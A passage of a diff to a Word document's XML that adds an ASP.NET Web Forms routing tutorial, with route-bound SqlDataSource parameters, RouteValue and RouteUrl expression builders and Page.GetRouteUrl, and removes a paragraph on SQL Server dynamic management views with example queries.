+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ConnectionString</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">="&lt;%$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ConnectionStrings</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:Northwind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> %&gt;"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>SelectCommand</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>="SELECT * FROM Albums WHERE Name LIKE @</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>searchterm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + '%'"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve"> &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>SelectParameters</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>asp</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:RouteParameter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> name="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>searchterm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">" </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>RouteKey</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>="term"  /&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &lt;/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>SelectParameters</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>asp</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:SqlDataSource</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="para"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="216" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>You can also use the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLTypewriter"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>RouteValueExpressionBuilder</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t> to write out a route parameter value a little more elegantly than just writing out </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLTypewriter"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Page.RouteValue</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLTypewriter"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLTypewriter"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>“&gt;key”]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>. If you want to write out the search term in a label, you can do the following:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>asp</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:Label</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ID="Label1" </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>runat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>="server" Text="&lt;%$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>RouteValue:Term</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>%&gt;" /&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="para"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="216" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>You can generate outgoing URLs for using the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLTypewriter"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Page.GetRouteUrl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLTypewriter"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLTypewriter"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t> in code-behind logic method:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>string</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Page.GetRouteUrl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   "</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>product-search</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>",</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>new</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> { term = "chai" });</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="para"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="216" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>The corresponding </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLTypewriter"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>RouteUrlExpressionBuilder</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t> allows you to construct an outgoing URL using Routing:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>asp</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>:HyperLink</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ID="HyperLink1"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>runat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>="server"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>NavigateUrl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>="&lt;%$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>RouteUrl</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>:Term</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>=Chai%&gt;"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            Search for Chai</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>asp</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>:HyperLink</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
-      <w:r>
-        <w:t>Dynamic management views (DMVs) and functions return server state information that can be used to monitor the health of a server instance, diagnose problems, and tune performance; that is, they let you see what is going on inside SQL Server. They were introduced in SQL Server 2005 as an alternative to system tables. One example is viewing operating system wait statistics via this query:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">SELECT * FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sys.dm_os_wait_stats</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Another example is examining current sessions, much like the sp_who2 command:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">SELECT * FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sys.dm_exec_sessions</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
